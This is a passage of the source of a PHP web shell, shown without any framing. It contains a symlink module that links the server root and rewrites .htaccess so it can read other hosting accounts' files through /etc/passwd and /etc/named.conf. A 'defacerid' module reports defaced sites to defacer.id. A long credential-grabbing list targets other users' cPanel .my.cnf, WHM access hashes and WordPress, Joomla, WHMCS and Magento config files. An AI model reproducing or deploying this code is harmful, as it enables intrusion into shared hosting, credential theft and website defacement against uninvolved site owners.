  2320. $ara = posix_getpwuid($uid);
  2321. if (!empty($ara))
  2322. {
  2323. while (list ($key, $val) = each($ara))
  2324. {
  2325. print "$val:";
  2326. }
  2327. print "\n";
  2328. }}}
  2329.  
  2330. flush();
  2331.  
  2332. echo "</textarea>
  2333. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2334. </form></center>";
  2335. }
  2336. }
  2337. }
  2338. elseif($_GET['do'] == 'symlink') {
  2339. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2340. $d0mains = @file("/etc/named.conf");
  2341. ##httaces
  2342. if($d0mains){
  2343. @mkdir("cox_sym",0777);
  2344. @chdir("cox_sym");
  2345. @exe("ln -s / root");
  2346. $file3 = 'Options Indexes FollowSymLinks
  2347. DirectoryIndex jancox.htm
  2348. AddType text/plain .php
  2349. AddHandler text/plain .php
  2350. Satisfy Any';
  2351. $fp3 = fopen('.htaccess','w');
  2352. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2353. echo "
  2354. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2355. <tr>
  2356. <td align=center><font size=2>S. No.</font></td>
  2357. <td align=center><font size=2>Domains</font></td>
  2358. <td align=center><font size=2>Users</font></td>
  2359. <td align=center><font size=2>Symlink</font></td>
  2360. </tr>";
  2361. $dcount = 1;
  2362. foreach($d0mains as $d0main){
  2363. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2364. flush();
  2365. if(strlen(trim($domains[1][0])) > 2){
  2366. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2367. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2368. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2369. <td>".$user['name']."</td>
  2370. <td><a href='$full/cox_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2371. flush();
  2372. $dcount++;}}}
  2373. echo "</table>";
  2374. }else{
  2375. $TEST=@file('/etc/passwd');
  2376. if ($TEST){
  2377. @mkdir("cox_sym",0777);
  2378. @chdir("cox_sym");
  2379. exe("ln -s / root");
  2380. $file3 = 'Options Indexes FollowSymLinks
  2381. DirectoryIndex jancox.htm
  2382. AddType text/plain .php
  2383. AddHandler text/plain .php
  2384. Satisfy Any';
  2385.  $fp3 = fopen('.htaccess','w');
  2386.  $fw3 = fwrite($fp3,$file3);
  2387.  @fclose($fp3);
  2388.  echo "
  2389.  <table align=center border=1><tr>
  2390.  <td align=center><font size=3>S. No.</font></td>
  2391.  <td align=center><font size=3>Users</font></td>
  2392.  <td align=center><font size=3>Symlink</font></td></tr>";
  2393.  $dcount = 1;
  2394.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2395.  while(!feof($file)){
  2396.  $s = fgets($file);
  2397.  $matches = array();
  2398.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2399.  $matches = str_replace("home/","",$matches[1]);
  2400.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2401.  continue;
  2402.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2403.  <td align=center><font class=txt>" . $matches . "</td>";
  2404.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2405.  $dcount++;}fclose($file);
  2406.  echo "</table>";}else{if($os != "Windows"){@mkdir("cox_sym",0777);@chdir("cox_sym");@exe("ln -s / root");$file3 = '
  2407.  Options Indexes FollowSymLinks
  2408. DirectoryIndex jancox.htm
  2409. AddType text/plain .php
  2410. AddHandler text/plain .php
  2411. Satisfy Any
  2412. ';
  2413.  $fp3 = fopen('.htaccess','w');
  2414.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2415.  echo "
  2416.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2417.  <table align=center border=1><tr>
  2418.  <td align=center><font size=3>ID</font></td>
  2419.  <td align=center><font size=3>Users</font></td>
  2420.  <td align=center><font size=3>Symlink</font></td></tr>";
  2421.  $temp = "";$val1 = 0;$val2 = 1000;
  2422.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2423.  if ($uid)$temp .= join(':',$uid)."\n";}
  2424.  echo '<br/>';$temp = trim($temp);$file5 =
  2425.  fopen("test.txt","w");
  2426.  fputs($file5,$temp);
  2427.  fclose($file5);$dcount = 1;$file =
  2428.  fopen("test.txt", "r") or exit("Unable to open file!");
  2429.  while(!feof($file)){$s = fgets($file);$matches = array();
  2430.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2431.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2432.  continue;
  2433.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2434.  <td align=center><font class=txt>" . $matches . "</td>";
  2435.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2436.  $dcount++;}
  2437.  fclose($file);
  2438.  echo "</table></div></center>";unlink("test.txt");
  2439.  } else
  2440.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  2441.  }
  2442.  }    
  2443. }
  2444. elseif($_GET['do'] == 'defacerid') {
  2445. echo "<center><form method='post'>
  2446.         <u>Defacer</u>: <br>
  2447.         <input type='text' name='hekel' size='50' value='0x1999'><br>
  2448.         <u>Team</u>: <br>
  2449.         <input type='text' name='tim' size='50' value='Indonesian Code Party'><br>
  2450.         <u>Domains</u>: <br>
  2451.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2452.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2453.         </form>";
  2454. $site = explode("\r\n", $_POST['sites']);
  2455. $go = $_POST['go'];
  2456. $hekel = $_POST['hekel'];
  2457. $tim = $_POST['tim'];
  2458. if($go) {
  2459. foreach($site as $sites) {
  2460. $zh = $sites;
  2461. $form_url = "https://www.defacer.id/notify";
  2462. $data_to_post = array();
  2463. $data_to_post['attacker'] = "$hekel";
  2464. $data_to_post['team'] = "$tim";
  2465. $data_to_post['poc'] = 'SQL Injection';
  2466. $data_to_post['url'] = "$zh";
  2467. $curl = curl_init();
  2468. curl_setopt($curl,CURLOPT_URL, $form_url);
  2469. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2470. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2471. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2472. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2473. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2474. $result = curl_exec($curl);
  2475. echo $result;
  2476. curl_close($curl);
  2477. echo "<br>";
  2478. }
  2479. }
  2480. }
  2481.  
  2482. elseif($_GET['do'] == 'config') {
  2483.     if($_POST){
  2484.         $passwd = $_POST['passwd'];
  2485.         mkdir("cox_config", 0777);
  2486.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2487.         $htc = fopen("cox_config/.htaccess","w");
  2488.         fwrite($htc, $isi_htc);
  2489.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2490.         foreach($user_config[1] as $user_cox) {
  2491.             $user_config_dir = "/home/$user_cox/public_html/";
  2492.             if(is_readable($user_config_dir)) {
  2493.                 $grab_config = array(
  2494.                                         "/home/$user_cox/.my.cnf" => "cpanel",
  2495.                     "/home/$user_cox/.accesshash" => "WHM-accesshash",
  2496.                     "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2497.                     "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2498.                     "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2499.                     "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",             
  2500.                     "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2501.                     "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  2502.                     "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2503.                     "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2504.                     "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2505.                     "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  2506.                     "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
  2507.                     "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",                   
  2508.                     "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2509.                     "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2510.                     "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2511.                     "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2512.                     "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2513.                     "/home/$user_cox/public_html/submitticket.php" => "WHMCS",                                     
  2514.                     "/home/$user_cox/public_html/configuration.php" => "Joomla",                   
  2515.                     "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2516.                     "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2517.                     "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
  2518.                     "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2519.                     "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2520.                     "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2521.                     "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2522.                     "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2523.                     "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2524.                     "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2525.                     "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2526.                     "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2527.                     "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2528.                     "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2529.                     "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2530.                     "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2531.                     "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2532.                     "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2533.                     "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2534.                     "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2535.                     "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2536.                     "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2537.                     "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2538.                     "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2539.                     "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2540.                     "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2541.                     "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2542.                     "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2543.                     "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2544.                     "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2545.                     "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2546.                     "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2547.                     "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2548.                     "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2549.                     "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2550.                     "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                  
  2551.                     "/home/$user_cox/public_html/wp-config.php" => "WordPress",
  2552.                     "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2553.                     "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2554.                     "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",     
  2555.                     "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2556.                     "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2557.                     "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2558.                     "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2559.                     "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2560.                     "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2561.                     "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2562.                     "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2563.                     "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2564.                     "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2565.                     "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2566.                     "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2567.                     "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2568.                     "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2569.                     "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2570.                     "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2571.                     "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2572.                     "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2573.                     "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2574.                     "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2575.                     "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2576.                     "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2577.                     "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2578.                     "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2579.                     "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2580.                     "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2581.                     "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2582.                     "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2583.                     "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2584.                     "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2585.                     "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2586.                     "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2587.                     "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2588.                                         "/home1/$user_cox/.my.cnf" => "cpanel",
  2589.                     "/home1/$user_cox/.accesshash" => "WHM-accesshash",
  2590.                     "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2591.                     "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2592.                     "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2593.                     "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  2594.                     "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2595.                     "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
  2596.                     "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2597.                     "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2598.                     "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2599.                     "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
  2600.                     "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
  2601.                     "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  2602.                     "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2603.                     "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2604.                     "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2605.                     "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2606.                     "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2607.                     "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  2608.                     "/home1/$user_cox/public_html/configuration.php" => "Joomla",                  
  2609.                     "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2610.                     "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2611.                     "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2612.                     "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2613.                     "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2614.                     "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2615.                     "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2616.                     "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2617.                     "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2618.                     "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2619.                     "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2620.                     "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2621.                     "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2622.                     "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2623.                     "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2624.                     "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2625.                     "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2626.                     "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2627.                     "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2628.                     "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2629.                     "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2630.                     "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2631.                     "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2632.                     "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2633.                     "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2634.                     "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2635.                     "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2636.                     "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2637.                     "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2638.                     "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2639.                     "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2640.                     "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2641.                     "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2642.                     "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2643.                     "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2644.                     "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2645.                     "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
  2646.                     "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2647.                     "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2648.                     "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2649.                     "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2650.                     "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2651.                     "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2652.                     "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2653.                     "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2654.                     "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2655.                     "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2656.                     "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2657.                     "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2658.                     "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2659.                     "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2660.                     "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2661.                     "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2662.                     "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2663.                     "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2664.                     "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2665.                     "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2666.                     "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2667.                     "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2668.                     "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2669.                     "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2670.                     "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2671.                     "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2672.                     "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2673.                     "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2674.                     "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2675.                     "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2676.                     "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2677.                     "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2678.                     "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2679.                     "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2680.                     "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2681.                     "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2682.                                         "/home2/$user_cox/.my.cnf" => "cpanel",
  2683.                     "/home2/$user_cox/.accesshash" => "WHM-accesshash",
  2684.                     "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2685.                     "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2686.                     "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2687.                     "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  2688.                     "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2689.                     "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
  2690.                     "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2691.                     "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2692.                     "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2693.                     "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
  2694.                     "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
  2695.                     "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  2696.                     "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2697.                     "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2698.                     "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2699.                     "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2700.                     "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2701.                     "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  2702.                     "/home2/$user_cox/public_html/configuration.php" => "Joomla",                  
  2703.                     "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2704.                     "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2705.                     "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2706.                     "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2707.                     "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2708.                     "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2709.                     "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2710.                     "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2711.                     "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2712.                     "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2713.                     "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2714.                     "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2715.                     "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2716.                     "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2717.                     "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2718.                     "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2719.                     "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2720.                     "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2721.                     "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2722.                     "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2723.                     "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2724.                     "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2725.                     "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2726.                     "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2727.                     "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2728.                     "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2729.                     "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2730.                     "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2731.                     "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2732.                     "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2733.                     "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2734.                     "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2735.                     "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2736.                     "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2737.                     "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2738.                     "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2739.                     "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
  2740.                     "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2741.                     "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2742.                     "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2743.                     "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2744.                     "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2745.                     "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2746.                     "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2747.                     "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2748.                     "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2749.                     "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2750.                     "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2751.                     "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2752.                     "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2753.                     "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2754.                     "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2755.                     "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2756.                     "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
